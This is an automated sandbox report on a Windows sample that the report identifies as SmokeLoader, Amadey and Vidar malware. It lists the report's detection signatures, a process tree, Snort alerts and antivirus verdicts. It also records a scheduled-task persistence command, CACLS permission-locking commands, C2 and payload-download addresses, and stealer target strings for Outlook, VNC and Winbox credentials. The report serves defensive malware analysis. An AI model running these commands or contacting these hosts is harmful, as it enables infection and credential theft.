Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kmxId0uLRn.exe

Overview

General Information

Sample Name:kmxId0uLRn.exe
Analysis ID:766457
MD5:c8782da2928f63712d03d0ea36c57c3f
SHA1:0d87ba5d17440501fe3629f56feb0a9193d43b43
SHA256:a68b2d14b767df5edb784bc338c84e09d73ac90a75346a9fedce2b0163ca9656
Tags:DofoilexeSmokeLoader
Infos:

Detection

Amadey, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Amadeys stealer DLL
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Uses cacls to modify the permissions of files
Contains functionality to launch a program with higher privileges

Classification

  • System is w10x64
  • kmxId0uLRn.exe (PID: 5936 cmdline: C:\Users\user\Desktop\kmxId0uLRn.exe MD5: C8782DA2928F63712D03D0EA36C57C3F)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 8F68.exe (PID: 1568 cmdline: C:\Users\user\AppData\Local\Temp\8F68.exe MD5: 46F30465FA693033E7D3D78468406C0C)
        • conhost.exe (PID: 1324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WerFault.exe (PID: 2292 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 268 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 9545.exe (PID: 6140 cmdline: C:\Users\user\AppData\Local\Temp\9545.exe MD5: C6524CC2CB091E23BE6D9526D6BCBC99)
        • gntuud.exe (PID: 5972 cmdline: "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" MD5: C6524CC2CB091E23BE6D9526D6BCBC99)
          • schtasks.exe (PID: 1012 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 4944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 504 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 4644 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cacls.exe (PID: 3516 cmdline: CACLS "gntuud.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cacls.exe (PID: 5652 cmdline: CACLS "gntuud.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cmd.exe (PID: 5680 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cacls.exe (PID: 5720 cmdline: CACLS "..\2c33368f7d" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cacls.exe (PID: 5868 cmdline: CACLS "..\2c33368f7d" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • rundll32.exe (PID: 4876 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • explorer.exe (PID: 2096 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 3940 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 1020 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 4044 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 4696 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5536 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5692 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5896 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 1004 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • thgcici (PID: 2108 cmdline: C:\Users\user\AppData\Roaming\thgcici MD5: C8782DA2928F63712D03D0EA36C57C3F)
  • gntuud.exe (PID: 3124 cmdline: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe MD5: C6524CC2CB091E23BE6D9526D6BCBC99)
  • thgcici (PID: 4892 cmdline: C:\Users\user\AppData\Roaming\thgcici MD5: C8782DA2928F63712D03D0EA36C57C3F)
  • gntuud.exe (PID: 3920 cmdline: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe MD5: C6524CC2CB091E23BE6D9526D6BCBC99)
  • cleanup
{"C2 url": "62.204.41.79/fb73jc3/index.php", "Version": "3.60"}
{"C2 list": ["http://s2scomm20.com/", "http://c2csosi228d.com/", "http://xdd42sdfsdf.com/"]}
{"C2 url": ["https://t.me/ttruelive", "https://steamcommunity.com/profiles/76561199443972360"], "Botnet": "1808", "Version": "56.2"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllINDICATOR_TOOL_PWS_AmadyDetects password stealer DLL. Dropped by AmadeyditekSHen
      • 0xd868:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
      • 0x15604:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
      • 0x16074:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
      • 0x15158:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
      • 0x151bc:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
      • 0xdd0c:$s3: \Mikrotik\Winbox\Addresses.cdb
      • 0x190d8:$s4: \HostName
      • 0x19100:$s5: \Password
      • 0x17c04:$s6: SOFTWARE\RealVNC\
      • 0x17c30:$s6: SOFTWARE\RealVNC\
      • 0x17c5c:$s6: SOFTWARE\RealVNC\
      • 0x17ca4:$s6: SOFTWARE\RealVNC\
      • 0x17cd0:$s6: SOFTWARE\RealVNC\
      • 0x18008:$s7: SOFTWARE\TightVNC\
      • 0x18034:$s7: SOFTWARE\TightVNC\
      • 0x18060:$s7: SOFTWARE\TightVNC\
      • 0x180ac:$s7: SOFTWARE\TightVNC\
      • 0x1c43c:$s8: cred.dll
      C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dllINDICATOR_TOOL_PWS_AmadyDetects password stealer DLL. Dropped by AmadeyditekSHen
          • 0xd868:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x15604:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x16074:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x15158:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          • 0x151bc:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          • 0xdd0c:$s3: \Mikrotik\Winbox\Addresses.cdb
          • 0x190d8:$s4: \HostName
          • 0x19100:$s5: \Password
          • 0x17c04:$s6: SOFTWARE\RealVNC\
          • 0x17c30:$s6: SOFTWARE\RealVNC\
          • 0x17c5c:$s6: SOFTWARE\RealVNC\
          • 0x17ca4:$s6: SOFTWARE\RealVNC\
          • 0x17cd0:$s6: SOFTWARE\RealVNC\
          • 0x18008:$s7: SOFTWARE\TightVNC\
          • 0x18034:$s7: SOFTWARE\TightVNC\
          • 0x18060:$s7: SOFTWARE\TightVNC\
          • 0x180ac:$s7: SOFTWARE\TightVNC\
          • 0x1c43c:$s8: cred.dll
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          0000001D.00000000.425029230.0000000000F01000.00000020.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            0000001D.00000002.428729367.0000000000F01000.00000020.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000000E.00000000.403627141.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
                  0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    Click to see the 51 entries
                    SourceRuleDescriptionAuthorStrings
                    43.3.thgcici.490000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      14.0.9545.exe.dd0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        11.2.thgcici.6a0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                          44.2.gntuud.exe.f00000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            14.0.9545.exe.dd0000.3.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              Click to see the 20 entries
                              No Sigma rule has matched
                              Timestamp:192.168.2.362.204.41.7949801802027700 12/13/22-20:09:37.904526
                              SID:2027700
                              Source Port:49801
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949764802027700 12/13/22-20:09:24.415498
                              SID:2027700
                              Source Port:49764
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949749802027700 12/13/22-20:09:18.397632
                              SID:2027700
                              Source Port:49749
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949767802027700 12/13/22-20:09:25.222687
                              SID:2027700
                              Source Port:49767
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949795802027700 12/13/22-20:09:35.735518
                              SID:2027700
                              Source Port:49795
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949770802027700 12/13/22-20:09:26.190276
                              SID:2027700
                              Source Port:49770
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.3185.246.221.15149699802851815 12/13/22-20:08:50.072694
                              SID:2851815
                              Source Port:49699
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949740802027700 12/13/22-20:09:15.487438
                              SID:2027700
                              Source Port:49740
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949798802027700 12/13/22-20:09:36.748511
                              SID:2027700
                              Source Port:49798
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949746802027700 12/13/22-20:09:17.426965
                              SID:2027700
                              Source Port:49746
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949743802027700 12/13/22-20:09:16.449856
                              SID:2027700
                              Source Port:49743
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949761802027700 12/13/22-20:09:23.806620
                              SID:2027700
                              Source Port:49761
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949752802027700 12/13/22-20:09:21.874851
                              SID:2027700
                              Source Port:49752
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949771802027700 12/13/22-20:09:26.565033
                              SID:2027700
                              Source Port:49771
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949802802027700 12/13/22-20:09:39.191576
                              SID:2027700
                              Source Port:49802
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949748802027700 12/13/22-20:09:18.100262
                              SID:2027700
                              Source Port:49748
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949777802027700 12/13/22-20:09:30.589327
                              SID:2027700
                              Source Port:49777
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949742802027700 12/13/22-20:09:16.147180
                              SID:2027700
                              Source Port:49742
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949794802027700 12/13/22-20:09:35.428306
                              SID:2027700
                              Source Port:49794
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949789802027700 12/13/22-20:09:34.068418
                              SID:2027700
                              Source Port:49789
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949754802027700 12/13/22-20:09:22.487126
                              SID:2027700
                              Source Port:49754
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949782802027700 12/13/22-20:09:32.020133
                              SID:2027700
                              Source Port:49782
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949747802027700 12/13/22-20:09:17.691856
                              SID:2027700
                              Source Port:49747
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949760802027700 12/13/22-20:09:23.551005
                              SID:2027700
                              Source Port:49760
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949776802027700 12/13/22-20:09:30.348436
                              SID:2027700
                              Source Port:49776
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949753802027700 12/13/22-20:09:22.159892
                              SID:2027700
                              Source Port:49753
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949759802027700 12/13/22-20:09:23.268020
                              SID:2027700
                              Source Port:49759
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949783802027700 12/13/22-20:09:32.395745
                              SID:2027700
                              Source Port:49783
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949807802027700 12/13/22-20:09:40.738951
                              SID:2027700
                              Source Port:49807
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949788802027700 12/13/22-20:09:33.792525
                              SID:2027700
                              Source Port:49788
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949765802027700 12/13/22-20:09:24.668106
                              SID:2027700
                              Source Port:49765
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949787802027700 12/13/22-20:09:33.525784
                              SID:2027700
                              Source Port:49787
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949790802027700 12/13/22-20:09:34.337562
                              SID:2027700
                              Source Port:49790
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949796802027700 12/13/22-20:09:36.034730
                              SID:2027700
                              Source Port:49796
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949781802027700 12/13/22-20:09:31.753391
                              SID:2027700
                              Source Port:49781
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949772802027700 12/13/22-20:09:29.469495
                              SID:2027700
                              Source Port:49772
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949735802027700 12/13/22-20:09:14.280167
                              SID:2027700
                              Source Port:49735
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949741802027700 12/13/22-20:09:15.797540
                              SID:2027700
                              Source Port:49741
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949799802027700 12/13/22-20:09:37.255404
                              SID:2027700
                              Source Port:49799
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949766802027700 12/13/22-20:09:24.922545
                              SID:2027700
                              Source Port:49766
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949803802027700 12/13/22-20:09:39.585529
                              SID:2027700
                              Source Port:49803
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949806802027700 12/13/22-20:09:40.381114
                              SID:2027700
                              Source Port:49806
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949757802027700 12/13/22-20:09:23.006710
                              SID:2027700
                              Source Port:49757
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949778802027700 12/13/22-20:09:30.907345
                              SID:2027700
                              Source Port:49778
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949775802027700 12/13/22-20:09:30.081643
                              SID:2027700
                              Source Port:49775
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949793802027700 12/13/22-20:09:35.174611
                              SID:2027700
                              Source Port:49793
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949800802027700 12/13/22-20:09:37.581033
                              SID:2027700
                              Source Port:49800
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949784802027700 12/13/22-20:09:32.706051
                              SID:2027700
                              Source Port:49784
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949769802027700 12/13/22-20:09:25.868942
                              SID:2027700
                              Source Port:49769
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949774802027700 12/13/22-20:09:29.736811
                              SID:2027700
                              Source Port:49774
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949805802027700 12/13/22-20:09:40.125674
                              SID:2027700
                              Source Port:49805
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949768802027700 12/13/22-20:09:25.563234
                              SID:2027700
                              Source Port:49768
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949751802027700 12/13/22-20:09:20.733567
                              SID:2027700
                              Source Port:49751
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949786802027700 12/13/22-20:09:33.253065
                              SID:2027700
                              Source Port:49786
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949791802027700 12/13/22-20:09:34.581849
                              SID:2027700
                              Source Port:49791
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949739802027700 12/13/22-20:09:15.157831
                              SID:2027700
                              Source Port:49739
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949745802027700 12/13/22-20:09:17.106517
                              SID:2027700
                              Source Port:49745
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949750802027700 12/13/22-20:09:19.302564
                              SID:2027700
                              Source Port:49750
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949792802027700 12/13/22-20:09:34.882839
                              SID:2027700
                              Source Port:49792
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949779802027700 12/13/22-20:09:31.163445
                              SID:2027700
                              Source Port:49779
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949785802027700 12/13/22-20:09:32.996655
                              SID:2027700
                              Source Port:49785
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949744802027700 12/13/22-20:09:16.793275
                              SID:2027700
                              Source Port:49744
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949780802027700 12/13/22-20:09:31.434688
                              SID:2027700
                              Source Port:49780
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949738802027700 12/13/22-20:09:14.724261
                              SID:2027700
                              Source Port:49738
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949762802027700 12/13/22-20:09:24.088211
                              SID:2027700
                              Source Port:49762
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949804802027700 12/13/22-20:09:39.864342
                              SID:2027700
                              Source Port:49804
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949756802027700 12/13/22-20:09:22.763314
                              SID:2027700
                              Source Port:49756
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949797802027700 12/13/22-20:09:36.311423
                              SID:2027700
                              Source Port:49797
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: http://62.204.41.79/fb73jc3/Plugins/cred64.dllAvira URL Cloud: Label: malware
                              Source: http://s2scomm20.com/Avira URL Cloud: Label: malware
                              Source: http://c2csosi228d.com/Avira URL Cloud: Label: malware
                              Source: http://31.41.244.228/fusa/bibar.exeAvira URL Cloud: Label: malware
                              Source: http://xdd42sdfsdf.com/Avira URL Cloud: Label: malware
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeAvira: detection malicious, Label: HEUR/AGEN.1253146
                              Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeAvira: detection malicious, Label: HEUR/AGEN.1253146
                              Source: kmxId0uLRn.exeReversingLabs: Detection: 69%
                              Source: kmxId0uLRn.exeVirustotal: Detection: 60%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllReversingLabs: Detection: 79%
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dllReversingLabs: Detection: 79%
                              Source: C:\Users\user\AppData\Roaming\thgciciReversingLabs: Detection: 69%
                              Source: kmxId0uLRn.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\thgciciJoe Sandbox ML: detected
                              Source: 12.0.8F68.exe.c42a60.7.unpackAvira: Label: TR/Patched.Ren.Gen
                              Source: 12.0.8F68.exe.c42a60.5.unpackAvira: Label: TR/Patched.Ren.Gen
                              Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://s2scomm20.com/", "http://c2csosi228d.com/", "http://xdd42sdfsdf.com/"]}
                              Source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://t.me/ttruelive", "https://steamcommunity.com/profiles/76561199443972360"], "Botnet": "1808", "Version": "56.2"}
                              Source: 14.0.9545.exe.dd0000.3.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.79/fb73jc3/index.php", "Version": "3.60"}
                              Source: kmxId0uLRn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
